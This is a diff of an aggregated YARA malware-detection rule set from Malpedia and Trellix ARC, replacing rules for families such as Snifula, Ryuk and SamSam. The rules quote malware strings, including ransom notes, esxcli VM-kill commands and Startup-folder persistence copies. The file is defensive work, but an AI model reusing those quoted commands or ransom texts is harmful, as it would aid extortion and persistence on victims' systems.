 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6802000080 e8???????? 83c41c 6a01 }
-		$sequence_1 = { 8945fc 8b4dfc 3b4d0c 7d26 }
-		$sequence_2 = { 8b55fc 8b4210 50 ff15???????? 8b4dfc 8981b4000000 }
-		$sequence_3 = { 8b45fc 8b484c 51 ff15???????? 8be5 5d c3 }
-		$sequence_4 = { 837df800 740a 8b4df8 51 ff15???????? 32c0 e9???????? }
-		$sequence_5 = { 7511 c645e000 8b45e0 25ff000000 e9???????? }
-		$sequence_6 = { 8d55dc 52 ff15???????? 8d45d0 50 }
-		$sequence_7 = { 8b4de8 894d98 8b5598 52 }
-		$sequence_8 = { 56 57 68???????? ff15???????? 8945dc 68???????? }
-		$sequence_9 = { ff7514 e8???????? 59 be02000080 }
-		$sequence_10 = { 8bf8 8b45fc 33c9 6a04 6800100000 894704 894f0c }
-		$sequence_11 = { ff74240c 6a00 56 e8???????? 6a00 }
-		$sequence_12 = { 85c0 7509 ff75d4 ff55d0 8975e0 834dfcff }
-		$sequence_13 = { ff7514 6a02 68???????? 50 56 e8???????? 83c41c }
-		$sequence_14 = { ffd3 85c0 8945fc 7514 6a04 57 ff7650 }
-		$sequence_15 = { ff742404 ff15???????? 83f8ff 750e ff15???????? 83f802 7503 }
+		$sequence_0 = { 8b4d10 8379080b 7f25 8b5518 52 8b4514 50 }
+		$sequence_1 = { 81e2ffff0000 0bc2 8b4df8 894114 8b45ec 5f 5e }
+		$sequence_2 = { 52 8bcd 50 8d1538864700 e8???????? 58 5a }
+		$sequence_3 = { e8???????? 898550ffffff 8b8550ffffff 8a08 80c101 8b9550ffffff 880a }
+		$sequence_4 = { c1f905 8b5508 83e21f c1e206 8b048dc0195700 0fbe4c1004 81c980000000 }
+		$sequence_5 = { 66d1e2 b802000000 6bc000 8b4d08 66891401 eb86 }
+		$sequence_6 = { 50 8b4d14 e8???????? 50 6a4c 8d8d70ffffff 51 }
+		$sequence_7 = { 8b45f4 83784000 7512 8b450c 83e801 8b4d10 83d900 }
+		$sequence_8 = { 8b4d08 d9ee d95c81fc 8b55f0 8b4508 d90490 d9ee }
+		$sequence_9 = { 51 e8???????? 83c408 dd5d94 dd4594 d9ee dae9 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 3126272
 }
-rule MALPEDIA_Win_Snifula_Auto : FILE
+rule MALPEDIA_Win_Zedhou_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7eb0b095-555b-5c46-a556-09b78e129a51"
+		id = "b7edbb31-b801-517b-bc19-dc86b8702084"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.snifula_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zedhou_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "8cd858ad508ccf0d5980ca44f29c7ac0d1ef182e09e60747d07a1ef2744ff82a"
+		logic_hash = "6241dd23f931d49343383f9ed85b9fc9d0b5c6b6eca9f5ed0e96f38f7152c02e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140290,28 +140850,28 @@ rule MALPEDIA_Win_Snifula_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff35???????? 89442410 6a01 57 ff15???????? 89442410 3bc7 }
-		$sequence_1 = { 8bf8 3bfe 752f 8d45f8 50 56 ff75fc }
-		$sequence_2 = { 743b ff15???????? 8bf8 68???????? 57 ffd6 59 }
-		$sequence_3 = { 53 33db 56 895dfc 3bfb 0f848b000000 8bc7 }
-		$sequence_4 = { 51 8365fc00 57 8bf8 85ff 7431 }
-		$sequence_5 = { 895dd8 8945dc 33d2 8b4ddc 8d4104 8b09 }
-		$sequence_6 = { e8???????? 8325????????00 5f 56 53 8b5d08 }
-		$sequence_7 = { 68???????? 56 ff15???????? 85c0 7414 56 6a00 }
-		$sequence_8 = { 8b03 e8???????? 8945fc 85c0 750f 394508 750a }
-		$sequence_9 = { ff35???????? ff35???????? 68???????? ff75f4 ffd7 83c42c ff36 }
+		$sequence_0 = { 8d55e0 52 ff15???????? 8bf0 4e 83fe10 7206 }
+		$sequence_1 = { 8b3d???????? 894594 ffd7 8b4594 83c605 7077 3bc6 }
+		$sequence_2 = { 59 56 68b8351722 e8???????? 59 }
+		$sequence_3 = { e8???????? 59 85c0 59 743f 6874fb1722 56 }
+		$sequence_4 = { 8b4d08 8b516c 52 68???????? ff15???????? 8bd0 }
+		$sequence_5 = { ff15???????? 83c414 c745fc31000000 68???????? 8b4d08 8b5154 52 }
+		$sequence_6 = { 8b4620 a801 740f 8b06 }
+		$sequence_7 = { c20800 836c240434 e9???????? 8b442404 56 ff74240c 8d70b0 }
+		$sequence_8 = { 59 8945f8 0f8414010000 8b3d???????? 689c251822 50 ffd7 }
+		$sequence_9 = { 8b01 ff502c 8dbedc000000 895dfc 8bcf e8???????? 6685c0 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 499712
 }
 /*
  * YARA Rule Set
  * Repository Name: Trellix ARC
  * Repository: https://github.com/advanced-threat-research/Yara-Rules/
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 1919562a59f190bda60c982424f6a24c542ee3e0
- * Number of Rules: 163
- * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance)
+ * Number of Rules: 164
+ * Skipped: 0 (age), 3 (quality), 0 (score), 0 (importance)
  *
  *
  * LICENSE
@@ -140578,2262 +141138,1543 @@ private rule TRELLIX_ARC_Ransom_Xinof_Chunk_PRIVATE : RANSOMWARE
 	condition:
 		any of them
 }
-rule TRELLIX_ARC_Anatova_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Vbs_Mykins_Botnet : BOTNET FILE
 {
 	meta:
-		description = "Rule to detect the Anatova Ransomware"
+		description = "Rule to detect the VBS files used in Mykins botnet"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "6e3205aa-42e4-5449-877e-37494cdd096b"
-		date = "2019-01-22"
+		id = "de0e5284-41c2-5baf-99f5-23ef27d6ed91"
+		date = "2018-01-24"
 		modified = "2020-08-14"
-		reference = "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Anatova.yar#L1-L25"
+		reference = "https://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_vbs_mykins_botnet.yar#L1-L29"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "97fb79ca6fc5d24384bf5ae3d01bf5e77f1d2c0716968681e79c097a7d95fb93"
-		logic_hash = "4fce15ad0ef2d3cb39f6092677f117308f847815cb2a5a491290a1f9d09776df"
-		score = 75
-		quality = 45
-		tags = "RANSOMWARE, FILE"
+		logic_hash = "ee48a2961e40c6be96b007794f585547ef337a46ca003152f15470069e2d2580"
+		score = 60
+		quality = 40
+		tags = "BOTNET, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Anatova"
+		malware_type = "botnet"
+		malware_family = "Botnet:W32/MyKins"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$regex = /anatova[0-9]@tutanota.com/
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and $regex
-}
-rule TRELLIX_ARC_Ransom_Linux_Hellokitty_0721 : RANSOMWARE FILE
-{
-	meta:
-		description = "rule to detect Linux variant of the Hello Kitty Ransomware"
-		author = "Christiaan @ ATR"
-		id = "097b02e7-93d8-5d4f-9964-7b660b3cd7b9"
-		date = "2021-07-19"
-		modified = "2021-07-19"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Linux_HelloKitty0721.yar#L1-L28"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "77a3809df4c7c591a855aaecd702af62935952937bb81661aa7f68e64dcf4fb4"
-		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
-		Rule_Version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:Linux/HelloKitty"
-		hash1 = "ca607e431062ee49a21d69d722750e5edbd8ffabcb54fa92b231814101756041"
-		hash2 = "556e5cb5e4e77678110961c8d9260a726a363e00bf8d278e5302cb4bfccc3eed"
-
-	strings:
-		$v1 = "esxcli vm process kill -t=force -w=%d" fullword ascii
-		$v2 = "esxcli vm process kill -t=hard -w=%d" fullword ascii
-		$v3 = "esxcli vm process kill -t=soft -w=%d" fullword ascii
-		$v4 = "error encrypt: %s rename back:%s" fullword ascii
-		$v5 = "esxcli vm process list" fullword ascii
-		$v6 = "Total VM run on host:" fullword ascii
-		$v7 = "error lock_exclusively:%s owner pid:%d" fullword ascii
-		$v8 = "Error open %s in try_lock_exclusively" fullword ascii
-		$v9 = "Mode:%d  Verbose:%d Daemon:%d AESNI:%d RDRAND:%d " fullword ascii
-		$v10 = "pthread_cond_signal() error" fullword ascii
-		$v11 = "ChaCha20 for x86_64, CRYPTOGAMS by <appro@openssl.org>" fullword ascii
+		$s1 = "fso.DeleteFile(WScript.ScriptFullName)" fullword ascii
+		$s2 = "Set ws = CreateObject(\"Wscript.Shell\")" fullword ascii
+		$s3 = "Set fso = CreateObject(\"Scripting.Filesystemobject\")" fullword ascii
+		$r = /Windows\\ime|web|inf|\\c[0-9].bat/
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 200KB and ( 8 of them ) ) or ( all of them )
+		uint16( 0 ) == 0x6553 and filesize < 1KB and any of ( $s* ) and $r
 }
-rule TRELLIX_ARC_Clop_Ransom_Note : RANSOMWARE FILE
+rule TRELLIX_ARC_MALWARE_Blackpos_Pdb : POS FILE
 {
 	meta:
-		description = "Rule to detect Clop Ransomware Note"
+		description = "BlackPOS PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "b18e4d4d-aa38-5009-a31b-ed038c5bd4f9"
-		date = "2019-08-01"
+		id = "f37e1522-49c4-5369-bc2c-33b070e9eae7"
+		date = "2014-01-24"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_ClopRansomNote.yar#L1-L34"
+		reference = "https://en.wikipedia.org/wiki/BlackPOS_Malware"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_blackpos_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "a90862e9dc59b1a8f38b777b4f529d5de740d0f49175813cae64f10ca9677826"
+		hash = "5a963e8aca62f3cf5872c6bff02d6dee0399728554c6ac3f5cb312b2ba7d7dbf"
+		logic_hash = "d8f3fa380ca15f0fae432849b8c16cb8a0a9d1427d3e72fbf89cbbd63b0849c9"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "POS, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Clop"
+		malware_type = "pos"
+		malware_family = "Pos:W32/BlackPos"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "If you want to restore your files write to emails" fullword ascii
-		$s2 = "All files on each host in the network have been encrypted with a strong algorithm." fullword ascii
-		$s3 = "Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover." fullword ascii
-		$s4 = "You will receive decrypted samples and our conditions how to get the decoder." fullword ascii
-		$s5 = "DO NOT RENAME OR MOVE the encrypted and readme files." fullword ascii
-		$s6 = "(Less than 6 Mb each, non-archived and your files should not contain valuable information" fullword ascii
-		$s7 = "We exclusively have decryption software for your situation" fullword ascii
-		$s8 = "Do not rename encrypted files." fullword ascii
-		$s9 = "DO NOT DELETE readme files." fullword ascii
-		$s10 = "Nothing personal just business" fullword ascii
-		$s11 = "eqaltech.su" fullword ascii
-
-	condition:
-		( uint16( 0 ) == 0x6f59 ) and filesize < 10KB and all of them
-}
-
-rule TRELLIX_ARC_Ransom_Egregor : RANSOMWARE FILE
-{
-	meta:
-		description = "Detect Egregor ransomware"
-		author = "Thomas Roccia | McAfee ATR team"
-		id = "b9f1a712-c168-5e0f-8b9e-cb03a6c43fc3"
-		date = "2020-10-28"
-		modified = "2020-10-28"
-		reference = "https://bazaar.abuse.ch/sample/004a2dc3ec7b98fa7fe6ae9c23a8b051ec30bcfcd2bc387c440c07ff5180fe9a/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_egregor.yar#L4-L31"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5f9fcbdf7ad86583eb2bbcaa5741d88a"
-		logic_hash = "8077c656eed0b1633da54f8d017d4eff122f2f4e486c4e1af6f6434ea33c0675"
-		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom/Egregor"
-		actor_type = "Cybercrime"
-		actor_group = "egregor"
-
-	strings:
-		$p1 = "ewdk.pdb" fullword ascii
-		$p2 = "testbuild.pdb" fullword ascii
-		$s1 = "M:\\" nocase ascii
-		$s2 = "1z1M9U9" fullword wide
-		$s3 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide
+		$pdb = "\\Projects\\Rescator\\MmonNew\\Debug\\mmon.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and hash.sha256 ( pe.rich_signature.clear_data ) == "b030ed1a7ca222a0923a59f321be7e55b8d0fc24c1134df1ba775bcf0994c79c" or ( pe.sections [ 4 ] . name == ".gfids" and pe.sections [ 5 ] . name == ".00cfg" ) and ( any of ( $p* ) or 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and any of them
 }
-rule TRELLIX_ARC_Locdoor_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Malw_Browser_Fox_Adware : ADWARE FILE
 {
 	meta:
-		description = "Rule to detect Locdoor/DryCry"
+		description = "Rule to detect Browser Fox Adware based on the PDB reference"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "d855d7fd-a1e3-561e-906e-103752285b0f"
-		date = "2018-09-02"
+		id = "67d20c3a-4e9d-5fbf-b26a-d7b5fb270d12"
+		date = "2015-01-15"
 		modified = "2020-08-14"
-		reference = "https://twitter.com/leotpsc/status/1036180615744376832"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_locdoor.yar#L1-L32"
+		reference = "https://www.sophos.com/en-us/threat-center/threat-analyses/adware-and-puas/Browse%20Fox.aspx"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_browser_fox_adware.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "0000c55f7cdbbad9bacba0e79637696f3bfeb95a5f71dfa0b398bc77a207eb41"
-		logic_hash = "c9519279a929feedae2bab58cd0de91f6c447827fa59afa927726fde84d21e1c"
+		hash = "c6f3d6024339940896dd18f32064c0773d51f0261ecbee8b0534fdd9a149ac64"
+		logic_hash = "462a05de46ec0d710cac80a05d4935279a43f49cbd5ef49c072f277982a76fce"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Locdoor"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
-		$s1 = "copy \"Locdoor.exe\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\temp00000000.exe\"" fullword ascii
-		$s2 = "copy wscript.vbs C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\wscript.vbs" fullword ascii
-		$s3 = "!! Your computer's important files have been encrypted! Your computer's important files have been encrypted!" fullword ascii
-		$s4 = "echo CreateObject(\"SAPI.SpVoice\").Speak \"Your computer's important files have been encrypted! " fullword ascii
-		$s5 = "! Your computer's important files have been encrypted! " fullword ascii
-		$s7 = "This program is not supported on your operating system." fullword ascii
-		$s8 = "echo Your computer's files have been encrypted to Locdoor Ransomware! To make a recovery go to localbitcoins.com and create a wa" ascii
-		$s9 = "Please enter the password." fullword ascii
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB ) and all of them
-}
-
-rule TRELLIX_ARC_Samsamransom2016 : RANSOMWARE FILE
-{
-	meta:
-		description = "No description has been set in the source file - Trellix ARC"
-		author = "Christiaan Beek | McAfee ATR Team"
-		id = "1c7985d0-d01c-52f7-8819-e038ccc01212"
-		date = "2018-01-25"
-		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_SamSam.yar#L3-L52"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "9e8034ec0ded82ad82b625d6d1b9918761decef0fd42a253722cdc620b355e1a"
-		score = 75
-		quality = 68
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/SamSam"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-		hash1 = "45e00fe90c8aa8578fce2b305840e368d62578c77e352974da6b8f8bc895d75b"
-
-	strings:
-		$x1 = "Could not list processes locking resource. Failed to get size of result." fullword wide
-		$s2 = "Could not list processes locking resource." fullword wide
-		$s3 = "samsam.del.exe" fullword ascii
-		$s4 = "samsam.exe" fullword wide
-		$s5 = "RM_UNIQUE_PROCESS" fullword ascii
-		$s6 = "KillProcessWithWait" fullword ascii
-		$s7 = "killOpenedProcessTree" fullword ascii
-		$s8 = "RM_PROCESS_INFO" fullword ascii
-		$s9 = "Exception caught in process: {0}" fullword wide
-		$s10 = "Could not begin restart session.  Unable to determine file locker." fullword wide
-		$s11 = "samsam.Properties.Resources.resources" fullword ascii
-		$s12 = "EncryptStringToBytes" fullword ascii
-		$s13 = "recursivegetfiles" fullword ascii
-		$s14 = "RSAEncryptBytes" fullword ascii
-		$s15 = "encryptFile" fullword ascii
-		$s16 = "samsam.Properties.Resources" fullword wide
-		$s17 = "TSSessionId" fullword ascii
-		$s18 = "Could not register resource." fullword wide
-		$s19 = "<recursivegetfiles>b__0" fullword ascii
-		$s20 = "create_from_resource" fullword ascii
-		$op0 = { 96 00 e0 00 29 00 0b 00 34 23 }
-		$op1 = { 96 00 12 04 f9 00 34 00 6c 2c }
-		$op2 = { 72 a5 0a 00 70 a2 06 20 94 }
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
-}
-
-rule TRELLIX_ARC_Samsam_Ransomware_Latest : RANSOMWARE FILE
-{
-	meta:
-		description = "Latest SamSA ransomware samples"
-		author = "Christiaan Beek"
-		id = "716b9282-013e-5194-8518-2fa1a4007095"
-		date = "2018-01-23"
-		modified = "2020-08-14"
-		reference = "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_SamSam.yar#L54-L105"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "88e344977bf6451e15fe202d65471a5f75d22370050fe6ba4dfa2c2d0fae7828"
-		logic_hash = "06703479795fdef64813471f11b275df544c90d5bcece4817d415cd504d7b317"
-		score = 50
-		quality = 68
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/SamSam"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
-		$s1 = "bedf08175d319a2f879fe720032d11e5" fullword wide
-		$s2 = "ksdghksdghkddgdfgdfgfd" fullword ascii
-		$s3 = "osieyrgvbsgnhkflkstesadfakdhaksjfgyjqqwgjrwgehjgfdjgdffg" fullword ascii
-		$s4 = "5c2d376c976669efaf9cb107f5a83d0c" fullword wide
-		$s5 = "B917754BCFE717EB4F7CE04A5B11A6351EEC5015" fullword ascii
-		$s6 = "f99e47c1d4ccb2b103f5f730f8eb598a" fullword wide
-		$s7 = "d2db284217a6e5596913e2e1a5b2672f" fullword wide
-		$s8 = "0bddb8acd38f6da118f47243af48d8af" fullword wide
-		$s9 = "f73623dcb4f62b0e5b9b4d83e1ee4323" fullword wide
-		$s10 = "916ab48e32e904b8e1b87b7e3ced6d55" fullword wide
-		$s11 = "c6e61622dc51e17195e4df6e359218a2" fullword wide
-		$s12 = "2a9e8d549af13031f6bf7807242ce27f" fullword wide
-		$s13 = "e3208957ad76d2f2e249276410744b29" fullword wide
-		$s14 = "b4d28bbd65da97431f494dd7741bee70" fullword wide
-		$s15 = "81ee346489c272f456f2b17d96365c34" fullword wide
-		$s16 = "94682debc6f156b7e90e0d6dc772734d" fullword wide
-		$s17 = "6943e17a989f11af750ea0441a713b89" fullword wide
-		$s18 = "b1c7e24b315ff9c73a9a89afac5286be" fullword wide
-		$s19 = "90928fd1250435589cc0150849bc0cff" fullword wide
-		$s20 = "67da807268764a7badc4904df351932e" fullword wide
-		$op0 = { 30 01 00 2b 68 79 33 38 68 34 77 65 36 34 74 72 }
-		$op1 = { 01 00 b2 04 00 00 01 00 84 }
-		$op2 = { 68 09 00 00 38 66 00 00 23 55 53 00 a0 6f 00 00 }
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and ( 8 of them ) and all of ( $op* ) ) or ( all of them )
-}
-rule TRELLIX_ARC_Unpacked_Shiva_Ransomware : RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect an unpacked sample of Shiva ransomware"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "c6cd4421-216f-5c1f-bb8d-fc8ab00bb72d"
-		date = "2018-09-05"
-		modified = "2020-08-14"
-		reference = "https://twitter.com/malwrhunterteam/status/1037424962569732096"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Shiva.yar#L1-L37"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "299bebcb18e218254960ef96c2e65a4dc1945dcdfe9fc68550022f99a474f56d"
-		logic_hash = "8a6a1d9f3b75617d8f07489ecf2867f90ddcf9fbe1db1e7c0f5c26833f88be3f"
-		score = 75
-		quality = 66
-		tags = "RANSOMWARE, FILE"
+		tags = "ADWARE, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Shiva"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
-		$s1 = "c:\\Users\\sys\\Desktop\\v 0.5\\Shiva\\Shiva\\obj\\Debug\\shiva.pdb" fullword ascii
-		$s2 = "This email will be as confirmation you are ready to pay for decryption key." fullword wide
-		$s3 = "Your important files are now encrypted due to a security problem with your PC!" fullword wide
-		$s4 = "write.php?info=" fullword wide
-		$s5 = " * Do not try to decrypt your data using third party software, it may cause permanent data loss." fullword wide
-		$s6 = " * Do not rename encrypted files." fullword wide
-		$s7 = ".compositiontemplate" fullword wide
-		$s8 = "You have to pay for decryption in Bitcoins. The price depends on how fast you write to us." fullword wide
-		$s9 = "\\READ_IT.txt" fullword wide
-		$s10 = ".lastlogin" fullword wide
-		$s11 = ".logonxp" fullword wide
-		$s12 = " * Decryption of your files with the help of third parties may cause increased price" fullword wide
-		$s13 = "After payment we will send you the decryption tool that will decrypt all your files." fullword wide
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB ) and all of them
-}
-rule TRELLIX_ARC_Ryuk_Ransomware : RANSOMWARE FILE
-{
-	meta:
-		description = "Ryuk Ransomware hunting rule"
-		author = "Christiaan Beek - McAfee ATR team"
-		id = "d3e67e26-3b34-5c28-a1c0-c4aeacd49df9"
-		date = "2019-04-25"
-		modified = "2021-07-12"
-		reference = "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Ryuk.yar#L1-L47"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "43c0be708fa8a388dce6e1dd721e24329b5b08a942d99e9b2631c90155790c4b"
-		score = 50
-		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v2"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Ryuk"
+		malware_type = "adware"
+		malware_family = "Adware:W32/BrowserFox"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$x1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii
-		$x2 = "\\System32\\cmd.exe" fullword wide
-		$s1 = "C:\\Users\\Admin\\Documents\\Visual Studio 2015\\Projects\\ConsoleApplication54new crypted" ascii
-		$s2 = "fg4tgf4f3.dll" fullword wide
-		$s3 = "lsaas.exe" fullword wide
-		$s4 = "\\Documents and Settings\\Default User\\sys" fullword wide
-		$s5 = "\\Documents and Settings\\Default User\\finish" fullword wide
-		$s6 = "\\users\\Public\\sys" fullword wide
-		$s7 = "\\users\\Public\\finish" fullword wide
-		$s8 = "You will receive btc address for payment in the reply letter" fullword ascii
-		$s9 = "hrmlog" fullword wide
-		$s10 = "No system is safe" fullword ascii
-		$s11 = "keystorage2" fullword wide
-		$s12 = "klnagent" fullword wide
-		$s13 = "sqbcoreservice" fullword wide
-		$s14 = "tbirdconfig" fullword wide
-		$s15 = "taskkill" fullword wide
-		$op0 = { 8b 40 10 89 44 24 34 c7 84 24 c4 }
-		$op1 = { c7 44 24 34 00 40 00 00 c7 44 24 38 01 }
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
-}
-rule TRELLIX_ARC_RANSOM_RYUK_May2021 : RANSOMWARE FILE
-{
-	meta:
-		description = "Rule to detect latest May 2021 compiled Ryuk variant"
-		author = "Marc Elias | McAfee ATR Team"
-		id = "6e415a9e-7373-50a8-ad57-f95220faed9c"
-		date = "2021-05-21"
-		modified = "2021-07-12"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Ryuk.yar#L91-L113"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "8f368b029a3a5517cb133529274834585d087a2d3a5875d03ea38e5774019c8a"
-		logic_hash = "b379c1182e60ce8c777668386d8cbd08350dd2363770dec56502bf44aaf5d7f6"
-		score = 50
-		quality = 70
-		tags = "RANSOMWARE, FILE"
-		version = "0.1"
-
-	strings:
-		$ryuk_filemarker = "RYUKTM" fullword wide ascii
-		$sleep_constants = { 68 F0 49 02 00 FF (15|D1) [0-4] 68 ?? ?? ?? ?? 6A 01 }
-		$icmp_echo_constants = { 68 A4 06 00 00 6A 44 8D [1-6] 5? 6A 00 6A 20 [5-20] FF 15 }
+		$pdb = "\\Utilities\\130ijkfv.o4g\\Desktop\\Desktop.OptChecker\\bin\\Release\\ BooZaka.Opt"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 200KB and ( $ryuk_filemarker or ( $sleep_constants and $icmp_echo_constants ) )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and any of them
 }
-rule TRELLIX_ARC_Screenlocker_Acroware : RANSOMWARE FILE
+rule TRELLIX_ARC_Festi_Botnet_Pdb : BOTNET FILE
 {
 	meta:
